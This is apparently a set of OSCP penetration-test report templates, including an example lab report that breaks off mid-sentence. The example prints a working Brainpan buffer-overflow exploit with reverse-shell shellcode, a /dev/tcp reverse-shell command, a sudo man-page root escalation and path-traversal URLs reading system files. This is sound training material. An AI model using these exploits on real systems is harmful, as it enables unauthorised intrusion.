[
  {
    "path": "Exam Report template.md",
    "content": "# Offensive Security - Penetration Test Report for OSCP Exam\r\n\r\n<!-- Insert your details here -->\r\n[email@email.email]\r\nOSID: [OS-XXXXX]\r\n[Date]\r\n\r\n# Table of Contents\r\n\r\n# Outline\r\n\r\n## Introduction\r\n\r\nThe Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security OSCP Certification Exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the Exam Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.\r\n\r\n## Objective\r\n\r\nThe objective of this assessment is to perform an internal penetration test against the Offensive Security Exam network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.\r\n\r\n## Requirements\r\n\r\nThe student will be required to fill out this penetration testing report fully and to include the following sections:\r\n\r\n- Overall High-Level Summary and Recommendations (non-technical)\r\n- Methodology walkthrough and detailed outline of steps taken\r\n- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable\r\n- Any additional items that were not included\r\n\r\n# High-Level Summary\r\n\r\nThe author of this report was tasked with performing an internal penetration test towards the Offensive Security Exam Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Exam Lab systems. 
The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security.\r\n\r\n<!-- Update number of compromised machines -->\r\nDuring the assessment, several alarming vulnerabilities were identified on Offensive Security’s exam network. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, XXXXXXX systems were successfully compromised, granting full control over every system in the network. These systems, as well as a brief description of how access was obtained, are listed in the section below.\r\n\r\n## Overview of Compromised Machines\r\n\r\nIt should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.\r\n\r\n<!-- Update the below sections with the right subnets, hosts, and a brief description of the initial exploited vulnerability -->\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - Remote (Custom) Buffer Overflow\r\n\r\n## Recommendations\r\n\r\nIt is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. 
For each identified vulnerability, patching recommendations are provided in the following chapters.\r\n\r\nOne thing to note is that these systems require frequent patching and, once patched, should remain on a regular patch program to protect against additional vulnerabilities that are discovered at a later date.\r\n\r\n# Methodologies\r\n\r\nA widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured. In this chapter, a breakdown of the used methodology is provided. \r\n\r\n## Information Gathering\r\n\r\nThe information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range was in scope:\r\n\r\n<!-- Update the list of subnets -->\r\n- IP RANGE (X.X.X.X)\r\n\r\nAs part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.\r\n\r\n## Penetration\r\n<!-- Update this paragraph with the appropriate amount of compromised machines -->\r\nThe penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **5** systems were successfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.\r\n\r\n<!-- Update chosen IP for Metasploit -->\r\nIt should be noted that the Metasploit Framework was utilised for one box during the execution of these tests. 
The IP address chosen for Metasploit usage was **[XXX.XXX.XXX.XXX]**.\r\n\r\n## Maintaining Access\r\n\r\nMaintaining access to a system is important to attackers; ensuring that access to a system can be regained after it has been exploited is invaluable.\r\nThe 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.\r\n\r\n## Lateral Movement\r\n\r\nAs part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.\r\n\r\n## House Cleaning\r\n\r\nThe 'house cleaning' portions of the assessment ensure that remnants of the penetration test are removed.\r\nOften fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.\r\nEnsuring that no remnants of our penetration test are left over is important.\r\n\r\nAfter all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system.\r\n\r\n# Exploitation Details\r\n\r\n<!-- Insert machine write-ups from .md template here -->"
  },
  {
    "path": "Examples/Example Report _ No Styling.md",
    "content": "# Example Report - Penetration Test Report for VulnHub Internal Labs\r\n\r\nme@localhost\r\n\r\nSOME-1D3NT1F13R\r\n\r\nToday\r\n\r\n# Outline\r\n## Introduction\r\n\r\nThe Example Lab penetration test report contains all efforts that were conducted in order to pass The Example Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as technical knowledge.\r\n\r\n## Objective\r\n\r\nThe objective of this assessment is to perform an internal penetration test against the Example Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.\r\n\r\n## Requirements\r\n\r\nThe student will be required to fill out this penetration testing report fully and to include the following sections:\r\n\r\n- Overall High-Level Summary and Recommendations (non-technical)\r\n- Methodology walkthrough and detailed outline of steps taken\r\n- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable\r\n- Any additional items that were not included\r\n\r\n# High-Level Summary\r\n\r\nThe author of this report was tasked with performing an internal penetration test towards The Example Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. 
The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate internal Lab systems – including but not limited to the internal domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting back findings.\r\n\r\nDuring the assessment, several alarming vulnerabilities were identified on internal networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were successfully compromised, granting full control over every system in the network. These systems, as well as a brief description of how access was obtained, are listed in the section below.\r\n\r\n## Overview of Compromised Machines\r\n\r\nIt should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.\r\n\r\n- 10.0.0.138 (BrainPan) - Buffer Overflow\r\n- 10.0.0.139 (Kioptrix2014) - Local File Inclusion and remote code execution\r\n- 10.0.100.105 (Zico) - Default credentials and arbitrary file write\r\n- 10.0.100.107 (LazyAdmin) - Misconfigured SMB share and weak credentials\r\n\r\n## Recommendations\r\n\r\nIt is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. 
For each application, patching recommendations are provided.\r\n\r\nOne thing to note is that these systems require frequent patching and, once patched, should remain on a regular patch program to protect against additional vulnerabilities that are discovered at a later date.\r\n\r\n# Methodologies\r\n\r\nA widely adopted approach to performing penetration testing was utilized during the tests to test how well The Example Lab environments are secured.\r\nBelow, a breakdown of the applied methodology is provided. \r\n\r\n## Information Gathering\r\n\r\nThe information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range is in scope:\r\n\r\n- The 'internal' subnet: 10.0.0.0/16\r\n\r\nAs part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.\r\n\r\n## Penetration\r\n\r\nThe penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **4** out of **4** systems were successfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.\r\n\r\n## Maintaining Access\r\n\r\nMaintaining access to a system is important to attackers; ensuring that access to a system can be regained after it has been exploited is invaluable.\r\nThe 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. 
As such, having a foothold into a system proves invaluable.\r\n\r\n## Lateral Movement\r\n\r\nAs part of the engagement, exploitation in closed subnets was requested, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.\r\n\r\n## House Cleaning\r\n\r\nThe 'house cleaning' portions of the assessment ensure that remnants of the penetration test are removed.\r\nOften fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.\r\nEnsuring that no remnants of our penetration test are left over is important.\r\n\r\nAfter all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. No additional cleanup should be required.\r\n\r\n# Exploitation Details: Internal Subnet (10.0.0.0/16)\r\n\r\n## System IP 10.0.0.138 (Brainpan)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.0.138      |\r\n| Hostname          | Brainpan        |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nTo exploit Brainpan, a buffer overflow exploit was developed based on a binary that was disclosed via the web server. Once we had successfully developed an exploit for the program on our test server, we used it to gain a shell on the target system. 
We break out of the virtual Windows environment and exploit a `sudo` binary to gain command execution as root.\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\nPORT      STATE SERVICE REASON  VERSION                                                                             \r\n9999/tcp  open  abyss?  syn-ack                                                                                     \r\n| fingerprint-strings:                                                                                              \r\n|   NULL: \r\n|     _| _| \r\n|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| \r\n|     _|_| _| _| _| _| _| _| _| _| _| _| _|\r\n|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|\r\n|     [________________________ WELCOME TO BRAINPAN _________________________]\r\n|_    ENTER THE PASSWORD\r\n10000/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 2.7.3)\r\n|_http-server-header: SimpleHTTP/0.6 Python/2.7.3\r\n|_http-title: Site doesn't have a title (text/html).\r\n1 service unrecognized despite returning data.\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN \r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\r\n    inet 127.0.0.1/8 scope host lo\r\n    inet6 ::1/128 scope host \r\n       valid_lft forever preferred_lft forever\r\n2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000\r\n    link/ether 00:0c:29:da:50:81 brd ff:ff:ff:ff:ff:ff\r\n    inet 10.0.0.138/24 brd 10.0.0.255 scope global eth0\r\n    inet6 fe80::20c:29ff:feda:5081/64 scope link \r\n       valid_lft forever preferred_lft forever\r\n3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN qlen 1000\r\n    link/ether 00:0c:29:da:50:8b brd ff:ff:ff:ff:ff:ff\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\nN/A\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability 
exploitation\r\n\r\nNmap finds two non-default services. Port 9999 seems to be running a terminal application, but we need a password to access it.\r\n\r\n```\r\n# nc 10.0.0.138 9999\r\n_|                            _|                                        \r\n_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \r\n_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\r\n_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\r\n_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\r\n                                            _|                          \r\n                                            _|\r\n\r\n[________________________ WELCOME TO BRAINPAN _________________________]\r\n                          ENTER THE PASSWORD                              \r\n\r\n                          >> hello\r\n                          ACCESS DENIED\r\n```\r\n\r\nPort 10000 is identified as `SimpleHTTPServer`, and browsing to it, it seems to return a banner image on safe coding practices. Enumerating subfolders of the web server with `gobuster`, we find `/bin`, which is listable and contains `brainpan.exe`. Let's analyze this application!\r\n\r\n```\r\n# gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\r\n/bin (Status: 301)\r\n```\r\n\r\nWe load the binary onto our Windows VM and start fuzzing it. We find that if we send 1000 \"A\" characters as our password, the application hangs. Inspecting it in our debugging application (Immunity Debugger) we find that we have overwritten the stack, including `EIP`!\r\n\r\n![a7b7b9d025ee7b2331b0360b7f1a60eb.png](_resources/bd626d2837644bc5908d1a10c044bc61.png)\r\n\r\n```\r\nmsf-pattern_create -l 1000\r\n```\r\n\r\nWe then send that string as our password, and see that the EIP is overwritten with the value `35724134`. 
We can now identify the offset as follows.\r\n\r\n```\r\n# msf-pattern_offset -l 1000 -q 35724134\r\n[*] Exact match at offset 524\r\n```\r\n\r\nThis would imply that we *exactly* overwrite `EIP` if we send 524 \"A\" characters and 4 \"B\" characters. Doing exactly that, we indeed manage to overwrite `EIP` with precision.\r\n\r\n![3fccedb5d57ec60e0ed35b3f6b4cf1df.png](_resources/43674b8c9f7f41ea8785d605952406e6.png)\r\n\r\nNow, we send an array of the binary characters ranging from `\\x01` to `\\xff` in our buffer, to identify bad characters. Inspecting the characters in our buffer, none seem to have disappeared or caused issues in the buffer. As such, our only bad character is `\\x00`, which we already removed.\r\n\r\nNow to generate a payload. For our test system, we generate the following payload. Note that once we deploy it on the target, we need to replace this payload with one generated with a different `LHOST` address.\r\n\r\n```\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.155 LPORT=443 EXITFUNC=thread -f py -b \"\\x00\"\r\n```\r\n\r\nThis results in a big payload, which we include in our script. We prepend several `\\x90` (NOP) characters to ensure the payload is triggered correctly.\r\n\r\nFinally, we have to find a `JMP ESP` or `CALL ESP` instruction to instruct the program to actually execute our payload. Using `msf-nasm_shell` to find the respective opcodes, we find that we can use `FFE4` or `FFD4`.\r\n\r\n```\r\n# msf-nasm_shell \r\nnasm > jmp esp\r\n00000000  FFE4              jmp esp\r\nnasm > call esp\r\n00000000  FFD4              call esp\r\n```\r\n\r\nWe can find memory addresses with these instructions in our debugger, using the `mona.py` plugin. First, we run `!mona modules` to identify an unprotected module.\r\n\r\n![2917175e6f9be3d4ce5f8045ad575d14.png](_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png)\r\n\r\nWe find that we can use the binary itself (`brainpan.exe`), since it doesn't have any protections. 
Using this information, we run the following query to locate `jmp esp` instructions in memory!\r\n\r\n```\r\n!mona find -s '\\xff\\xe4' -m brainpan.exe\r\n```\r\n\r\nWe find one address: `0x311712f3`. This doesn't contain any bad characters, so should be usable. We update our `EIP` overwrite in our script to the Little Endian notation of that address, which is `\"\\xf3\\x12\\x17\\x31\"`. We are now ready to try our exploit.\r\n\r\nRunning the exploit on our test machine, we get a shell back!\r\n\r\n![20ae0f542aec4372a4ddf58375ea0835.png](_resources/78f9b63a3ff44b8dbddeb34bb174f469.png)\r\n\r\nPerfect. Now we only have to re-generate our payload and replace our target IP address to weaponize the exploit.\r\n\r\n```\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.0.100.108 LPORT=443 EXITFUNC=thread -f py -b \"\\x00\"\r\n```\r\n\r\nThe final exploit code is as follows:\r\n\r\n```python\r\n#!/usr/bin/env python\r\n\r\nimport socket\r\n\r\ntarget = \"10.0.0.138\"\r\nport = 9999\r\n\r\n# badchars: \\x00\r\n\r\nbuf =  b\"\"\r\nbuf += b\"\\xbf\\xb0\\x6b\\xdc\\x19\\xdb\\xd7\\xd9\\x74\\x24\\xf4\\x5d\\x29\"\r\nbuf += b\"\\xc9\\xb1\\x52\\x83\\xc5\\x04\\x31\\x7d\\x0e\\x03\\xcd\\x65\\x3e\"\r\nbuf += b\"\\xec\\xd1\\x92\\x3c\\x0f\\x29\\x63\\x21\\x99\\xcc\\x52\\x61\\xfd\"\r\nbuf += b\"\\x85\\xc5\\x51\\x75\\xcb\\xe9\\x1a\\xdb\\xff\\x7a\\x6e\\xf4\\xf0\"\r\nbuf += b\"\\xcb\\xc5\\x22\\x3f\\xcb\\x76\\x16\\x5e\\x4f\\x85\\x4b\\x80\\x6e\"\r\nbuf += b\"\\x46\\x9e\\xc1\\xb7\\xbb\\x53\\x93\\x60\\xb7\\xc6\\x03\\x04\\x8d\"\r\nbuf += b\"\\xda\\xa8\\x56\\x03\\x5b\\x4d\\x2e\\x22\\x4a\\xc0\\x24\\x7d\\x4c\"\r\nbuf += b\"\\xe3\\xe9\\xf5\\xc5\\xfb\\xee\\x30\\x9f\\x70\\xc4\\xcf\\x1e\\x50\"\r\nbuf += b\"\\x14\\x2f\\x8c\\x9d\\x98\\xc2\\xcc\\xda\\x1f\\x3d\\xbb\\x12\\x5c\"\r\nbuf += b\"\\xc0\\xbc\\xe1\\x1e\\x1e\\x48\\xf1\\xb9\\xd5\\xea\\xdd\\x38\\x39\"\r\nbuf += b\"\\x6c\\x96\\x37\\xf6\\xfa\\xf0\\x5b\\x09\\x2e\\x8b\\x60\\x82\\xd1\"\r\nbuf += 
b\"\\x5b\\xe1\\xd0\\xf5\\x7f\\xa9\\x83\\x94\\x26\\x17\\x65\\xa8\\x38\"\r\nbuf += b\"\\xf8\\xda\\x0c\\x33\\x15\\x0e\\x3d\\x1e\\x72\\xe3\\x0c\\xa0\\x82\"\r\nbuf += b\"\\x6b\\x06\\xd3\\xb0\\x34\\xbc\\x7b\\xf9\\xbd\\x1a\\x7c\\xfe\\x97\"\r\nbuf += b\"\\xdb\\x12\\x01\\x18\\x1c\\x3b\\xc6\\x4c\\x4c\\x53\\xef\\xec\\x07\"\r\nbuf += b\"\\xa3\\x10\\x39\\x87\\xf3\\xbe\\x92\\x68\\xa3\\x7e\\x43\\x01\\xa9\"\r\nbuf += b\"\\x70\\xbc\\x31\\xd2\\x5a\\xd5\\xd8\\x29\\x0d\\xd0\\x1c\\x55\\xa1\"\r\nbuf += b\"\\x8c\\x1e\\x95\\x38\\xf6\\x96\\x73\\x50\\x18\\xff\\x2c\\xcd\\x81\"\r\nbuf += b\"\\x5a\\xa6\\x6c\\x4d\\x71\\xc3\\xaf\\xc5\\x76\\x34\\x61\\x2e\\xf2\"\r\nbuf += b\"\\x26\\x16\\xde\\x49\\x14\\xb1\\xe1\\x67\\x30\\x5d\\x73\\xec\\xc0\"\r\nbuf += b\"\\x28\\x68\\xbb\\x97\\x7d\\x5e\\xb2\\x7d\\x90\\xf9\\x6c\\x63\\x69\"\r\nbuf += b\"\\x9f\\x57\\x27\\xb6\\x5c\\x59\\xa6\\x3b\\xd8\\x7d\\xb8\\x85\\xe1\"\r\nbuf += b\"\\x39\\xec\\x59\\xb4\\x97\\x5a\\x1c\\x6e\\x56\\x34\\xf6\\xdd\\x30\"\r\nbuf += b\"\\xd0\\x8f\\x2d\\x83\\xa6\\x8f\\x7b\\x75\\x46\\x21\\xd2\\xc0\\x79\"\r\nbuf += b\"\\x8e\\xb2\\xc4\\x02\\xf2\\x22\\x2a\\xd9\\xb6\\x43\\xc9\\xcb\\xc2\"\r\nbuf += b\"\\xeb\\x54\\x9e\\x6e\\x76\\x67\\x75\\xac\\x8f\\xe4\\x7f\\x4d\\x74\"\r\nbuf += b\"\\xf4\\x0a\\x48\\x30\\xb2\\xe7\\x20\\x29\\x57\\x07\\x96\\x4a\\x72\"\r\n\r\nbuffer = \"A\" * 524\r\nbuffer += \"\\xf3\\x12\\x17\\x31\"\r\nbuffer += \"\\x90\" * 32 + buf\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.connect((target,port))\r\nprint (sock.recv(1024))\r\nsock.send(buffer)\r\nprint (sock.recv(1024))\r\nsock.close()\r\n```\r\n\r\nRunning the exploit, we get a shell back as user Puck!\r\n\r\n##### Severity\r\n\r\n`High` - An attacker could identify and exploit this vulnerability to remotely gain code execution on the machine.\r\n\r\n##### Remediation\r\n\r\n- Patch the `brainpan.exe` binary to properly allocate buffer space and sanitize user inputs\r\n- Limit network access to the machine\r\n\r\n##### 
Proof\r\n\r\n![d66c74dd136d44b2e0b8aa1968f8ee6d.png](_resources/3fcfd682f31f487fa15a1e936f6d54e4.png)\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nOddly enough, our new shell seems to be on a Linux filesystem, judging by the directories in the root directory. This implies that the Windows binary we found was running via `wine` or a similar emulation environment.\r\n\r\n![3fe07241c0b2ef536ff825e501317e50.png](_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png)\r\n\r\nTo prevent confusion and avoid limitations, we can turn this shell into a regular `sh` shell by spawning a new reverse shell with the regular Linux `sh` binary. For that, we can run the following from our prompt.\r\n\r\n```\r\n/bin/sh -i >& /dev/tcp/10.0.0.128/443 0>&1\r\n```\r\n\r\n![af1fcd5da95378a05cc417d6491f1509.png](_resources/7bafa472ec614deabdd9cfca82d1119e.png)\r\n\r\nOn our new shell, we can gain a full TTY as follows.\r\n\r\n```\r\n/usr/bin/script -qc /bin/bash /dev/null\r\n```\r\n\r\n```\r\n$ sudo -l\r\nMatching Defaults entries for puck on this host:\r\n    env_reset, mail_badpass,\r\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\r\n\r\nUser puck may run the following commands on this host:\r\n    (root) NOPASSWD: /home/anansi/bin/anansi_util\r\n```\r\n\r\nThat seems interesting! We cannot read the binary file to see what it does, so let's just run it.\r\n\r\n```\r\n$ sudo /home/anansi/bin/anansi_util\r\nUsage: /home/anansi/bin/anansi_util [action]\r\nWhere [action] is one of:\r\n  - network\r\n  - proclist\r\n  - manual [command]\r\n```\r\n\r\nInteresting, it looks like we can run some commands as root using this utility. After some playing around, the `manual` command seems to be the most promising. 
Running this command opens the manpage of a command that we specify, as root.\r\n\r\n```\r\n$ sudo /home/anansi/bin/anansi_util manual bash\r\nNo manual entry for manual\r\nWARNING: terminal is not fully functional\r\n-  (press RETURN)\r\nBASH(1)                                                                BASH(1)\r\n\r\nNAME\r\n       bash - GNU Bourne-Again SHell\r\n\r\nSYNOPSIS\r\n       bash [options] [file]\r\n\r\nCOPYRIGHT\r\n       Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.\r\n\r\nDESCRIPTION\r\n       Bash  is  an  sh-compatible  command language interpreter that executes\r\n       commands read from the standard input or from a file.  Bash also incor‐\r\n       porates useful features from the Korn and C shells (ksh and csh).\r\n\r\n       Bash  is  intended  to  be a conformant implementation of the Shell and\r\n       Utilities portion  of  the  IEEE  POSIX  specification  (IEEE  Standard\r\n       1003.1).  Bash can be configured to be POSIX-conformant by default.\r\n\r\nOPTIONS\r\n       All  of  the  single-character shell options documented in the descrip‐\r\n       tion of the set builtin command can be used as options when  the  shell\r\n Manual page bash(1) line 1 (press h for help or q to quit)\r\n```\r\n\r\nThis isn't too interesting in itself, but we are dropped into an interactive `less`-like prompt since the content doesn't fit on the screen. 
As listed [here](https://gtfobins.github.io/gtfobins/man/#sudo), we can run system commands by prepending `!`, giving us command execution as root!\r\n\r\nRunning `!bash` at the manpage prompt drops us into a root shell, giving us full access over the system.\r\n\r\n##### Severity\r\n\r\n`High` - Any user with sudo permissions on the `anansi_util` binary may escalate their privileges to gain full control of the system.\r\n\r\n##### Remediation\r\n\r\n- Restrict `sudo` access on a least-privilege basis\r\n- Remove or restrict the `manual` functionality within the `anansi_util` binary\r\n\r\n##### Proof\r\n\r\n![68784bdfb72a2e608d14a626cd6ed655.png](_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png)\r\n\r\n## System IP 10.0.0.139 (Kioptrix2014)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.0.139      |\r\n| Hostname          | Kioptrix2014    |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nThis machine required several steps to exploit. First, we identify a Local File Inclusion vulnerability in the `pChart` system on the web server. We use this to read the apache configuration files and identify user-agent based filtering for the web server on port 8080. Once there, we identify the `phptax` application which we can use to gain command execution as user `www`. 
Since the machine is running FreeBSD version 9, we utilize a kernel exploit to escalate our privileges to root.\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\n# Nmap 7.80 scan initiated Mon May  4 11:00:08 2020 as: nmap -sV -sC -p- -v -o nmapfull.out 10.0.0.139\r\nNmap scan report for 10.0.0.139\r\nHost is up (0.00047s latency).\r\nNot shown: 65532 filtered ports\r\nPORT     STATE  SERVICE VERSION\r\n22/tcp   closed ssh\r\n80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)\r\n| http-methods: \r\n|_  Supported Methods: HEAD\r\n|_http-title: Site doesn't have a title (text/html).\r\n8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)\r\n|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8\r\n|_http-title: 403 Forbidden\r\nMAC Address: 00:0C:29:FE:67:D7 (VMware)\r\n\r\nRead data files from: /usr/bin/../share/nmap\r\nService detection performed. 
Please report any incorrect results at https://nmap.org/submit/ .\r\n# Nmap done at Mon May  4 11:02:18 2020 -- 1 IP address (1 host up) scanned in 129.88 seconds\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\nem0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500\r\n        options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>\r\n        ether 00:0c:29:fe:67:d7\r\n        inet 10.0.0.139 netmask 0xffffff00 broadcast 10.0.0.255\r\n        nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>\r\n        media: Ethernet autoselect (1000baseT <full-duplex>)\r\n        status: active\r\nplip0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> metric 0 mtu 1500\r\n        nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>\r\nlo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384\r\n        options=3<RXCSUM,TXCSUM>\r\n        inet6 ::1 prefixlen 128 \r\n        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 \r\n        inet 127.0.0.1 netmask 0xff000000 \r\n        nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>\r\nipfw0: flags=8801<UP,SIMPLEX,MULTICAST> metric 0 mtu 65536 \r\n        nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\nN/A\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds two ports open, 80 and 8080. Port 8080 seems to reject all of our requests with a 403 error, and port 80 just returns \"It works!\". However, by inspecting the source code, we see a reference to `/pChart2.1.3/index.php`.\r\n\r\n![ffb80df9362fb3c922d028c49da290b3.png](_resources/5aaf06cbb9f34198ade6738ce59f6c87.png)\r\n\r\nVisiting that page, we get to see the pChart system v2.1.3 without authentication. This version seems to be vulnerable to XSS and Path Traversal, as outlined [here](https://www.exploit-db.com/exploits/31173). Testing out the vulnerabilities for ourselves, we can indeed read arbitrary files through the path traversal. 
For example, we can read `/etc/passwd`.\r\n\r\n![3124b1f27f3ccc417fc3881795114ecd.png](_resources/8b57d11edb854ab1af23239e63b089ef.png)\r\n\r\nThe passwd file also reveals that we are dealing with FreeBSD 9, which is relevant since it affects the file paths we need to use. We can find the HTTP access log here, for example.\r\n\r\n```\r\nhttp://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fvar/log/httpd-access.log\r\n```\r\n\r\nUnfortunately, any PHP that we inject through user agent poisoning doesn't seem to be executed and is reflected back to us. Looks like we'll have to find another way in. Enumerating more files, we find the apache configuration.\r\n\r\n```\r\nhttp://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf\r\n```\r\n\r\nNear the bottom, it contains some interesting information about the vhost on port `8080`:\r\n\r\n```\r\nSetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser\r\n\r\n<VirtualHost *:8080>\r\n    DocumentRoot /usr/local/www/apache22/data2\r\n\r\n<Directory \"/usr/local/www/apache22/data2\">\r\n    Options Indexes FollowSymLinks\r\n    AllowOverride All\r\n    Order allow,deny\r\n    Allow from env=Mozilla4_browser\r\n</Directory>\r\n\r\n</VirtualHost>\r\n```\r\n\r\nIn short, it sets an environment variable if our user agent begins with 